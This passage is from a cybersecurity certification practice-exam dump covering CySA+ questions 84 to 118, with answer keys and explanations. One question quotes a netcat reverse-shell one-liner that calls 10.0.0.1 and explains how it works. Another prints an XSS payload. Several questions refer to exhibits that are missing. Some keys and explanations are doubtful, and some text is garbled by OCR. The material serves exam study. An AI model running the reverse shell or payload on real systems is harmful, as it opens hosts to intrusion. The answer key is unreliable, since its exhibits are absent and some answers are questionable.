C. Disaster recovery and business continuity planning, and the definition of access control requirements
and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the
operation of security management systems

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: A successful information security program consists of several key elements that align with the
organization's goals and objectives, and address the risks and threats to its information assets. Security
policy implementation: This is the process of developing, documenting, and enforcing the rules and
standards that govern the security of the organization's information assets. Security policies define the
scope, objectives, roles, and responsibilities of the security program, as well as the acceptable use, access
control, incident response, and compliance requirements for the information assets. Assignment of roles
and responsibilities: This is the process of identifying and assigning the specific tasks and duties related to
the security program to the appropriate individuals or groups within the organization. Roles and
responsibilities define who is accountable, responsible, consulted, and informed for each security activity,
such as risk assessment, vulnerability management, threat detection, incident response, auditing, and
reporting. Information asset classification: This is the process of categorizing the information assets based
on their value, sensitivity, and criticality to the organization. Information asset classification helps to
determine the appropriate level of protection and controls for each asset, as well as the impact and
likelihood of a security breach or loss. Information asset classification also facilitates the prioritization of
security resources and efforts based on the risk level of each asset.

QUESTION 84
A security audit for unsecured network services was conducted, and the following output was generated:
Which of the following services should the security team investigate further? (Select two).

A. 21
B. 22
C. 23
D. 636
E. 1723
F. 3389

Correct Answer: CD
Explanation

Explanation/Reference:
Explanation: The output shows the results of a port scan, which is a technique used to identify open ports
and services running on a network host. Port scanning can be used by attackers to discover potential
vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their
network devices1 The output lists six ports that are open on the target host, along with the service name
and version associated with each port. The service name indicates the type of application or protocol that
is using the port, while the version indicates the specific release or update of the service. The service
name and version can provide useful information for both attackers and defenders, as they can reveal the
capabilities, features, and weaknesses of the service.
Among the six ports listed, two are particularly risky and should be investigated further by the security
team: port 23 and port 636. Port 23 is used by Telnet, which is an old and insecure protocol for remote
login and command execution. Telnet does not encrypt any data transmitted over the network, including
usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by
attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized
access, execute arbitrary commands, or cause denial-of-service attacks on the target host23 Port 636 is
used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services
over a secure connection. LDAPS encrypts the data exchanged between the client and the server using
SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also
be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example,
attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing
attacks, or certificate revocation attacks on LDAPS connections. Therefore, the security team should
investigate further why port 23 and port 636 are open on the target host, and what services are running on
them. The security team should also consider disabling or replacing these services with more secure
alternatives, such as SSH for port 23 and StartTLS for port 6362

QUESTION 85
An employee is no longer able to log in to an account after updating a browser. The employee usually has
several tabs open in the browser. Which of the following attacks was most likely performed?
A. RFI
B. LFI
C. CSRF
D. XSS

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The most likely attack that was performed is CSRF (Cross-Site Request Forgery). This is an
attack that forces a user to execute unwanted actions on a web application in which they are currently
authenticated1. If the user has several tabs open in the browser, one of them might contain a malicious link
or form that sends a request to the web application to change the user's password, email address, or other
account settings. The web application will not be able to distinguish between the legitimate requests made
by the user and the forged requests made by the attacker. As a result, the user will lose access to their
account. To prevent CSRF attacks, web applications should implement some form of anti-CSRF tokens or
other mechanisms that validate the origin and integrity of the requests2. These tokens are unique and
unpredictable values that are generated by the server and embedded in the forms or URLs that perform
state-changing actions. The server will then verify that the token received from the client matches the token
stored on the server before processing the request. This way, an attacker cannot forge a valid request
without knowing the token value.
Some other possible attacks that are not relevant to this scenario are:
RFI (Remote File Inclusion) is an attack that allows an attacker to execute malicious code on a web server
by including a remote file in a script. This attack does not affect the user's browser or account settings. LFI
(Local File Inclusion) is an attack that allows an attacker to read or execute local files on a web server by
manipulating the input parameters of a script. This attack does not affect the user's browser or account
settings. XSS (Cross-Site Scripting) is an attack that injects malicious code into a web page that is then
executed by the user's browser. This attack can affect the user's browser or account settings, but it
requires the user to visit a compromised web page or click on a malicious link. It does not depend on
having several tabs open in the browser.

QUESTION 86
Due to an incident involving company devices, an incident responder needs to take a mobile phone to the
lab for further investigation. Which of the following tools should be used to maintain the integrity of the
mobile phone while it is transported? (Select two).

A. Signal-shielded bag
B. Tamper-evident seal
C. Thumb drive
D. Crime scene tape
E. Write blocker
F. Drive duplicator

Correct Answer: AB
Explanation

Explanation/Reference:
Explanation: A signal-shielded bag and a tamper-evident seal are tools that can be used to maintain the
integrity of the mobile phone while it is transported. A signal-shielded bag prevents the phone from
receiving or sending any signals that could compromise the data or evidence on the device. A tamper-
evident seal ensures that the phone has not been opened or altered during the transportation. References:
Mobile device forensics, Section: Acquisition

QUESTION 87
Which of the following would eliminate the need for different passwords for a variety or internal application?

A. CASB
B. SSO
C. PAM
D. MFA
Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple
applications. It eliminates the need for different passwords for various internal applications, streamlining
the authentication process.

QUESTION 88
A vulnerability scan of a web server that is exposed to the internet was recently completed. A security
analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L

Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H

Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L

Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L

Which of the following vulnerabilities should be patched first?

A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerability 4

Correct Answer: A
Explanation

QUESTION 89
A Chief Information Security Officer (CISO) wants to disable a functionality on a business- critical web
application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased
cost.

Which of the following risk treatments best describes what the CISO is looking for?

A. Transfer
B. Mitigate
C. Accept
D. Avoid

Correct Answer: B
Explanation

QUESTION 90
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the
organization's environment. An analyst views the details of these events below:

Which of the following statements best describes the intent of the attacker, based on this one-liner?

A. Attacker is escalating privileges via JavaScript.

B. Attacker is utilizing custom malware to download an additional script.
C. Attacker is executing PowerShell script "AccessToken.psr.
D. Attacker is attempting to install persistence mechanisms on the target machine.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The one-liner script is utilizing JavaScript to execute a PowerShell command that downloads
and runs a script from an external source, indicating the use of custom malware to download an additional
script. References:
CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 156.

QUESTION 91
An analyst needs to provide recommendations based on a recent vulnerability scan:

Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are
identified?

A. SMB use domain SID to enumerate users

B. SYN scanner
C. SSL certificate cannot be trusted
D. Scan not performed with admin privileges

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: This is because scanning without admin privileges can limit the scope and accuracy of the
vulnerability scan, and potentially miss some critical vulnerabilities that require higher privileges to detect.
According to the OWASP Vulnerability Management Guide1, "scanning without administrative privileges
will result in a large number of false negatives and an incomplete scan". Therefore, the analyst should
recommend addressing this issue to ensure potential vulnerabilities are identified.

QUESTION 92
Which of the following best describes the threat concept in which an organization works to ensure that all
network users only open attachments from known sources?

A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

Correct Answer: C
Explanation

Explanation/Reference:
An unintentional insider threat is a type of network security threat that occurs when a legitimate user of the
network unknowingly exposes the network to malicious activity, such as opening a phishing email or a
malware-infected attachment from an unknown source. This can compromise the network security and
allow attackers to access sensitive data or systems. The other options are not related to the threat concept
of ensuring that all network users only open attachments from known sources.
ReferencesCompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 1: Threat and Vulnerability
Management, page 13.What is Network Security | Threats, Best Practices | Imperva, Network Security
Threats and Attacks, Phishing section.Five Ways to Defend Against Network Security Threats, 2. Use
Firewalls section.

QUESTION 93
Which of the following does "federation" most likely refer to within the context of identity and access
management?

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or
conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple
domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a
user
D. Correlating one's identity with the attributes and associated applications the user has access to

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Federation is a system of trust between two parties for the purpose of authenticating users
and conveying information needed to authorize their access to resources. By using federation, a user can
use one set of credentials to access multiple domains that trust each other.

QUESTION 94
A security analyst found the following vulnerability on the company's website:

<INPUT TYPE="IMAGE" SRC="javascript:alert(`test');">

Which of the following should be implemented to prevent this type of attack in the future?

A. Input sanitization
B. Output encoding
C. Code obfuscation
D. Prepared statements

Correct Answer: A
Explanation

Explanation/Reference:
This is a type of web application vulnerability called cross-site scripting (XSS), which allows an attacker to
inject malicious code into a web page that is viewed by other users. XSS can be used to steal cookies,
session tokens, credentials, or other sensitive information, or to perform actions on behalf of the victim.
Input sanitization is a technique that prevents XSS attacks by checking and filtering the user input before
processing it. Input sanitization can remove or encode any characters or strings that may be interpreted as
code by the browser, such as <, >, ", ', or javascript:. Input sanitization can also validate the input against a
predefined format or range of values, and reject any input that does not match. Output encoding is a
technique that prevents XSS attacks by encoding the output before sending it to the browser. Output
encoding can convert any characters or strings that may be interpreted as code by the browser into
harmless entities, such as <, >, ", ', or javascript:. Output encoding can also escape any special characters
that may have a different meaning in different contexts, such as , /, or ;. Code obfuscation is a technique
that makes the source code of a web application more difficult to read and understand by humans. Code
obfuscation can use techniques such as renaming variables and functions, removing comments and
whitespace, replacing literals with expressions, or adding dummy code. Code obfuscation can help protect
the intellectual property and trade secrets of a web application, but it does not prevent XSS attacks.

QUESTION 95
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following
types of activities is being observed?

A. Potential precursor to an attack

B. Unauthorized peer-to-peer communication
C. Rogue device on the network
D. System updates

Correct Answer: A
Explanation

QUESTION 96
Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

A. It provides analytical pivoting and identifies knowledge gaps.

B. It guarantees that the discovered vulnerability will not be exploited again in the future.
C. It provides concise evidence that can be used in court
D. It allows for proactive detection and analysis of attack events

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The Diamond Model of Intrusion Analysis is a framework that helps analysts to understand
the relationships between the adversary, the victim, the infrastructure, and the capability involved in an
attack. It also enables analytical pivoting, which is the process of moving from one piece of information to
another related one, and identifies knowledge gaps that need further investigation.

QUESTION 97
A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of
the following controls would best mitigate the attacks?

A. Block the attacks using firewall rules.

B. Deploy an IPS in the perimeter network.
C. Roll out a CDN.
D. Implement a load balancer.

Correct Answer: C
Explanation

Explanation/Reference:
Rolling out a CDN is the best control to mitigate the Layer 4 DDoS attacks against the company website. A
CDN is a Content Delivery Network, which is a system of distributed servers that deliver web content to
users based on their geographic location, the origin of the web page, and the content delivery server. A
CDN can help protect against Layer 4 DDoS attacks, which are volumetric attacks that aim to exhaust the
network bandwidth or resources of the target website by sending a large amount of traffic, such as SYN
floods, UDP floods, or ICMP floods. A CDN can mitigate these attacks by distributing the traffic across
multiple servers, caching the web content closer to the users, filtering out malicious or unwanted traffic,
and providing scalability and redundancy for the website12. References: How to Stop a DDoS Attack:
Mitigation Steps for Each OSI Layer, Application layer DDoS attack | Cloudflare

QUESTION 98
A security analyst needs to provide evidence of regular vulnerability scanning on the company's network
for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: OpenVAS is an open-source tool that performs comprehensive vulnerability scanning and
assessment on the network. It can generate reports and evidence of the scan results, which can be used
for auditing purposes. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5,
page 199; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 207.

QUESTION 99
A security analyst is working on a server patch management policy that will allow the infrastructure team to
be informed more quickly about new patches.

Which of the following would most likely be required by the infrastructure team so that vulnerabilities can
be remediated quickly? (Select two).

A. Hostname
B. Missing KPI
C. CVE details
D. POC availability
E. loCs
F. npm identifier

Correct Answer: CE
Explanation

Explanation/Reference:
Explanation: CVE details and IoCs are information that would most likely be required by the infrastructure
team so that vulnerabilities can be remediated quickly. CVE details provide the description, severity,
impact, and solution of the vulnerabilities that affect the servers. IoCs are indicators of compromise that
help identify and respond to potential threats or attacks on the servers. References: Server and
Workstation Patch Management Policy, Section: Policy; Patch Management Policy: Why You Need One in
2024, Section: What is a patch management policy?

QUESTION 100
A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

A. Network pivoting
B. Host scanning
C. Privilege escalation
D. Reverse shell

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The command rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f is
a one-liner that creates a reverse shell from the target machine to the attacker's machine. It does the
following steps:
m -f /tmp/f deletes any existing file named /tmp/f knod /tmp/f p creates a named pipe (FIFO) file named /
tmp/f at /tmp/f|/bin/sh -i 2>&1 reads from the pipe and executes the commands using /bin/sh in interactive
mode, redirecting the standard error to the standard output c 10.0.0.1 1234 > tmp/f connects to the
attacker's machine at IP address 10.0.0.1 and port 1234 using netcat, and writes the output to the pipe
This way, the attacker can send commands to the target machine and receive the output through the
netcat connection, effectively creating a reverse shell.
References
Hack the Galaxy
Reverse Shell Cheat Sheet

QUESTION 101
An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required
to have access to monthly reports and is the only external vendor with authorized access. The organization
prioritizes incident investigation according to the following hierarchy:

unauthorized data disclosure is more critical than denial of service attempts

which are more important than ensuring vendor data access

Based on the log files and the organization's priorities, which of the following hosts warrants additional
investigation?

A. 121.19.30.221
B. 134.17.188.5
C. 202.180.1582
D. 216.122.5.5

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. 121.19.30.221.

Based on the log files and the organization's priorities, the host that warrants additional investigation is
121.19.30.221, because it is the only host that accessed a file containing sensitive data and is not from the
partner vendor's range.
The log files show the following information:
The IP addresses of the hosts that accessed the web server The date and time of the access
The file path of the requested resource
The number of bytes transferred
The organization's priorities are:
Unauthorized data disclosure is more critical than denial of service attempts Denial of service attempts are
more important than ensuring vendor data access According to these priorities, the most serious threat to
the organization is unauthorized data disclosure, which occurs when sensitive, protected, or confidential
data is copied, transmitted, viewed, stolen, altered, or used by an individual unauthorized to do so123.
Therefore, the host that accessed a file containing sensitive data and is not from the partner vendor's
range poses the highest risk to the organization. The file that contains sensitive data is /reports/2023/
financials.pdf, as indicated by its name and path. This file was accessed by two hosts:
121.19.30.221 and 216.122.5.5. However, only 121.19.30.221 is not from the partner vendor's range,
which is 216.122.5.x. Therefore, 121.19.30.221 is a potential unauthorized data disclosure threat and
warrants additional investigation.
The other hosts do not warrant additional investigation based on the log files and the organization's
priorities.
Host 134.17.188.5 accessed /index.html multiple times in a short period of time, which could indicate a
denial of service attempt by flooding the web server with requests45. However, denial of service attempts
are less critical than unauthorized data disclosure according to the organization's priorities, and there is no
evidence that this host succeeded in disrupting the web server's normal operations.
Host 202.180.1582 accessed /images/logo.png once, which does not indicate any malicious activity or
threat to the organization.
Host 216.122.5.5 accessed /reports/2023/financials.pdf once, which could indicate unauthorized data
disclosure if it was not authorized to do so. However, this host is from the partner vendor's range, which is
required to have access to monthly reports and is the only external vendor with authorized access
according to the organization's requirements. Therefore, based on the log files and the organization's
priorities, host 121.19.30.221 warrants additional investigation as it poses the highest risk of unauthorized
data disclosure to the organization.

QUESTION 102
During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of
the following best describes how PII should be safeguarded during an incident?

A. Implement data encryption and close the data so only the company has access.
B. Ensure permissions are limited in the investigation team and encrypt the data.
C. Implement data encryption and create a standardized procedure for deleting data that is no longer
needed.
D. Ensure that permissions are open only to the company.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The best option to safeguard PII during an incident is to ensure permissions are limited in the
investigation team and encrypt the data. This is because limiting permissions reduces the risk of
unauthorized access or leakage of sensitive data, and encryption protects the data from being read or
modified by anyone who does not have the decryption key. Option A is not correct because closing the
data may hinder the investigation process and prevent collaboration with other parties who may need
access to the data. Option C is not correct because deleting data that is no longer needed may violate
legal or regulatory requirements for data retention, and may also destroy potential evidence for the
incident. Option D is not correct because opening permissions to the company may expose the data to
more people than necessary, increasing the risk of compromise or misuse. References: CompTIA CySA+
Study Guide: Exam CS0-002, 2nd Edition, Chapter 4, "Data Protection and Privacy Practices", page 195;
CompTIA CySA+ Certification Exam Objectives Version 4.0, Domain 4.0 "Compliance and Assessment",
Objective 4.1 "Given a scenario, analyze data as part of a security incident", Sub-objective "Data
encryption", page CompTIA CySA+ Study Guide: Exam CS0-002, 2nd Edition : CompTIA CySA+
Certification Exam Objectives Version 4.0.pdf)

QUESTION 103
An incident responder was able to recover a binary file through the network traffic. The binary file was also
found in some machines with anomalous behavior. Which of the following processes most likely can be
performed to understand the purpose of the binary file?

A. File debugging
B. Traffic analysis
C. Reverse engineering
D. Machine isolation

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Reverse engineering is the process of analyzing a binary file to understand its structure,
functionality, and behavior. It can help to identify the purpose of the binary file, such as whether it is a
malicious program, a legitimate application, or a library. Reverse engineering can involve various
techniques, such as disassembling, decompiling, debugging, or extracting strings or resources from the
binary file123. Reverse engineering can also help to find vulnerabilities, backdoors, or hidden features in
the binary file

QUESTION 104
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a
malicious downloader to ensure it will not be detected by the victim organization's endpoint security
protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's
actions?

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponizatign

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Weaponization is the stage of the Cyber Kill Chain where the threat actor creates or modifies
a malicious tool to use against a target. In this case, the threat actor compiles and tests a malicious
downloader, which is a type of weaponized malware. References: Cybersecurity 101, The Cyber Kill
Chain: The Seven Steps of a Cyberattack

QUESTION 105
A security analyst scans a host and generates the following output:

Which of the following best describes the output?

A. The host is unresponsive to the ICMP request.

B. The host Is running a vulnerable mall server.
C. The host Is allowlng unsecured FTP connectlons.
D. The host is vulnerable to web-based exploits.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The output shows that port 80 is open and running an HTTP service, indicating that the host
could potentially be vulnerable to web-based attacks. The other options are not relevant for this purpose:
the host is responsive to the ICMP request, as shown by the "Host is up" message; the host is not running
a mail server, as there is no SMTP or POP3 service detected; the host is not allowing unsecured FTP
connections, as there is no FTP service detected.References: According to the CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition123, one of the objectives for the exam is to "use appropriate tools and
methods to manage, prioritize and respond to attacks and vulnerabilities". The book also covers the usage
and syntax of nmap, a popular network scanning tool, in chapter 5. Specifically, it explains the meaning
and function of each option in nmap, such as "-sV" for version detection2, page 195.
Therefore, this is a reliable source to verify the answer to the question.

QUESTION 106
A security analyst has received an incident case regarding malware spreading out of control on a
customer's network. The analyst is unsure how to respond. The configured EDR has automatically
obtained a sample of the malware and its signature. Which of the following should the analyst perform next
to determine the type of malware, based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.

B. Configure the EDR to perform a full scan.
C. Transfer the malware to a sandbox environment.
D. Log in to the affected systems and run necstat.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The signature of the malware is a unique identifier that can be used to compare it with known
malware samples and their behaviors. Open-source threat intelligence sources provide information on
various types of malware, their indicators of compromise, and their mitigation strategies. By cross-
referencing the signature with these sources, the analyst can determine the type of malware and its
telemetry. The other options are not relevant for this purpose: configuring the EDR to perform a full scan
may not provide additional information on the malware type; transferring the malware to a sandbox
environment may expose the analyst to further risks; logging in to the affected systems and running netstat
may not reveal the malware activity. References: According to the CompTIA CySA+ Study Guide: Exam
CS0-003, 3rd Edition1, one of the objectives for the exam is to "use appropriate tools and methods to
manage, prioritize and respond to attacks and vulnerabilities". The book also covers the usage and syntax
of EDR, a tool used for endpoint security, in chapter 5. Specifically, it explains the meaning and function of
malware signatures and how they can be used to identify malware types1, page 203. It also discusses the
benefits and challenges of using open-source threat intelligence sources to enhance security analysis1,
page 211. Therefore, this is a reliable source to verify the answer to the question.

QUESTION 107
An organization has established a formal change management process after experiencing several critical
system failures over the past year. Which of the following are key factors that the change management
process will include in order to reduce the impact of system failures? (Select two).

A. Ensure users the document system recovery plan prior to deployment.

B. Perform a full system-level backup following the change.
C. Leverage an audit tool to identify changes that are being made.
D. Identify assets with dependence that could be impacted by the change.
E. Require diagrams to be completed for all critical systems.
F. Ensure that all assets are properly listed in the inventory management system.

Correct Answer: DF
Explanation

Explanation/Reference:
Explanation: The correct answers for key factors in the change management process to reduce the impact
of system failures are:

D. Identify assets with dependence that could be impacted by the change. F. Ensure that all assets are
properly listed in the inventory management system.

D. Identify assets with dependence that could be impacted by the change: This is crucial in change
management because understanding the interdependencies among assets can help anticipate and
mitigate the potential cascading effects of a change. By identifying these dependencies, the organization
can plan more effectively for changes and minimize the risk of unintended consequences that could lead to
system failures.

F. Ensure that all assets are properly listed in the inventory management system:
Maintaining an accurate and comprehensive inventory of assets is fundamental in change management.
Knowing exactly what assets the organization possesses and their characteristics allows for better
planning and impact analysis when changes are made. This ensures that no critical component is
overlooked during the change process, reducing the risk of failures due to incomplete information.
Other Options:
A. Ensure users document system recovery plan prior to deployment: While documenting a system
recovery plan is important, it's more related to disaster recovery and business continuity planning than
directly reducing the impact of system failures due to changes.

B. Perform a full system-level backup following the change: While backups are essential, they are
generally a reactive measure to recover from a failure, rather than a proactive measure to reduce the
impact of system failures in the first place.

C. Leverage an audit tool to identify changes that are being made: While using an audit tool is helpful for
tracking changes and ensuring compliance, it is not directly linked to reducing the impact of system failures
due to changes.

E. Require diagrams to be completed for all critical systems: While having diagrams of critical systems is
useful for understanding and managing them, it is not a direct method for reducing the impact of system
failures due to changes.
Diagrams are more about documentation and understanding rather than proactive change management.

QUESTION 108
During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees
takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

A. Registry changes or anomalies

B. Data exfiltration
C. Unauthorized privileges
D. File configuration changes

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The takeown command is used to take ownership of a file or folder that previously was denied
access to the current user or group12. The activity observed indicates that someone has taken ownership
of all files and folders under the
C:\Users\Documents\HR\Employees directory, which may contain sensitive or confidential information.
This could be a sign of unauthorized privileges, as the user or group may not have the legitimate right or
need to access those files or folders. Taking ownership of files or folders could also enable the user or
group to modify or delete them, which could affect the integrity or availability of the data.

QUESTION 109
An analyst investigated a website and produced the following:
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable
website?

A. nmap -sS -T4 -F insecure.org

B. nmap -o insecure.org
C. nmap -sV -T4 -F insecure.org
D. nmap -A insecure.org

Correct Answer: C
Explanation

QUESTION 110
The Chief Information Security Officer for an organization recently received approval to install a new EDR
solution. Following the installation, the number of alerts that require remediation by an analyst has tripled.
Which of the following should the organization utilize to best centralize the workload for the internal
security team? (Select two).

A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP

Correct Answer: AB
Explanation

Explanation/Reference:
Explanation: SOAR (Security Orchestration, Automation and Response) and SIEM (Security Information
and Event Management) are solutions that can help centralize the workload for the internal security team
by collecting, correlating, and analyzing alerts from different sources, such as EDR. SOAR can also
automate and streamline incident response workflows, while SIEM can provide dashboards and reports for
security monitoring and compliance. References: What is EDR? Endpoint Detection & Response, How
Does the Cyber Kill Chain Protect Against Attacks?; What is EDR Solution?, EDR solutions secure diverse
endpoints through central monitoring

QUESTION 111
A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify
the other in the event a threat is detected. Which of the following should the analyst utilize to best
accomplish this goal?

A. SMB share
B. API endpoint
C. SMTP notification
D. SNMP trap

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: An API endpoint is a point of entry for a communication between two different SaaS-based
security tools. It allows one tool to send requests and receive responses from the other tool using a
common interface. An API endpoint can be used to notify the other tool in the event a threat is detected
and trigger an appropriate action. SMB share, SMTP notification, and SNMP trap are not suitable for SaaS
integration security, as they are either network protocols or email services that do not provide a direct and
secure communication between two different SaaS tools. References: Top 10 Best SaaS Security Tools -
2023, What is SaaS Security? A Guide to Everything SaaS Security, 6 Key Considerations for SaaS
Integration Security | Prismatic, Introducing Security for Interconnected SaaS - Palo Alto Networks

QUESTION 112
An organization needs to bring in data collection and aggregation from various endpoints. Which of the
following is the best tool to deploy to help analysts gather this data?

A. DLP
B. NAC
C. EDR
D. NIDS

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: EDR stands for Endpoint Detection and Response, which is a tool that collects and
aggregates data from various endpoints, such as laptops, servers, or mobile devices. EDR helps analysts
monitor, detect, and respond to threats and incidents on the endpoints. EDR is more suitable than DLP
(Data Loss Prevention), NAC (Network Access Control), or NIDS (Network Intrusion Detection System) for
data collection and aggregation from endpoints. References: CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 2: Software and Systems Security, page 75; What Is Data Aggregation? (Examples +
Tools), Section: Data Aggregation: How It Works, Subsection: 1. Data Collection.

QUESTION 113
A security analyst reviews the following extract of a vulnerability scan that was performed against the web
server:
Which of the following recommendations should the security analyst provide to harden the web server?

A. Remove the version information on http-server-header.

B. Disable tcp_wrappers.
C. Delete the /wp-login.php folder.
D. Close port 22.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The vulnerability scan shows that the version information is visible in the http-server-header,
which can be exploited by attackers to identify vulnerabilities specific to that version. Removing or
obfuscating this information can enhance security. References: CompTIA CySA+ CS0-003 Certification
Study Guide, Chapter 4: Vulnerability Management, page 172; CompTIA CySA+ Study Guide: Exam CS0-
003, 3rd Edition, Chapter 5: Vulnerability Management, page 223.

QUESTION 114
Which of the following best explains the importance of communicating with staff regarding the official public
communication plan related to incidents impacting the organization?

A. To establish what information is allowed to be released by designated employees

B. To designate an external public relations firm to represent the organization
C. To ensure that all news media outlets are informed at the same time
D. To define how each employee will be contacted after an event occurs

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Communicating with staff about the official public communication plan is important to avoid
unauthorized or inaccurate disclosure of information that could harm the organization's reputation, security,
or legal obligations. It also helps to ensure consistency and clarity of the messages delivered to the public
and other stakeholders. https://resources.sei.cmu.edu/asset_files/Handbook/2021_002_001_651819.pdf

QUESTION 115
Which of the following stakeholders are most likely to receive a vulnerability scan report? (Select two).

A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems admininstration

Correct Answer: AF
Explanation

Explanation/Reference:
Explanation: Executive management and systems administration are the most likely stakeholders to
receive a vulnerability scan report because they are responsible for overseeing the security posture and
remediation efforts of the organization. Law enforcement, marketing, legal, and product owner are less
likely to be involved in the vulnerability management process or need access to the scan results.
References:
Cybersecurity Analyst+ - CompTIA, How To Write a Vulnerability Assessment Report | EC- Council,
Driving Stakeholder Alignment in Vulnerability Management - LogicGate

QUESTION 116
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity
framework that will help the organization demonstrate its investment in tools and systems to protect its
data. Which of the following did the CISO most likely select?

A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: ISO 27001 is an international standard that establishes a framework for implementing,
maintaining, and improving an information security management system (ISMS). It helps organizations
demonstrate their commitment to protecting their data and complying with various regulations and best
practices. The other options are not relevant for this purpose: PCI DSS is a standard that focuses on
protecting payment card data; COBIT is a framework that provides guidance on governance and
management of enterprise IT; ITIL is a framework that provides guidance on service management and
delivery. References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of
the objectives for the exam is to "use appropriate tools and methods to manage, prioritize and respond to
attacks and vulnerabilities". The book also covers the usage and syntax of various cybersecurity
frameworks and standards, such as ISO 27001, PCI DSS, COBIT, and ITIL, in chapter 1. Specifically, it
explains the meaning and function of each framework and standard, such as ISO 27001, which provides a
comprehensive approach to information security management1, page 29. Therefore, this is a reliable
source to verify the answer to the question.

QUESTION 117
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure
that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold

Correct Answer: C
Explanation

Explanation/Reference:
Integrity validation is the process of ensuring that the digital evidence has not been altered or tampered
with during collection, acquisition, preservation, or analysis. It usually involves generating and verifying
cryptographic hashes of the evidence, such as MD5 or SHA-1. Integrity validation is essential for
maintaining the accuracy and admissibility of the digital evidence in court.

QUESTION 118
A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets.
During the initial scan, users reported that network printers began to print pages that contained unreadable
text and icons.

Which of the following should the analyst do to ensure this behavior does not oocur during subsequent
vulnerability scans?

A. Perform non-credentialed scans.

B. Ignore embedded web server ports.
C. Create a tailored scan for the printer subnet.
D. Increase the threshold length of the scan timeout.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The best way to prevent network printers from printing pages during a vulnerability scan is to
create a tailored scan for the printer subnet that excludes the ports and services that trigger the printing
behavior. The other options are not effective for this purpose: performing non-credentialed scans may not
reduce the impact on the printers; ignoring embedded web server ports may not cover all the possible
ports that cause printing; increasing the threshold length of the scan timeout may not prevent the printing
from occurring.
References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the
objectives for the exam is to "use appropriate tools and methods to manage, prioritize and respond to
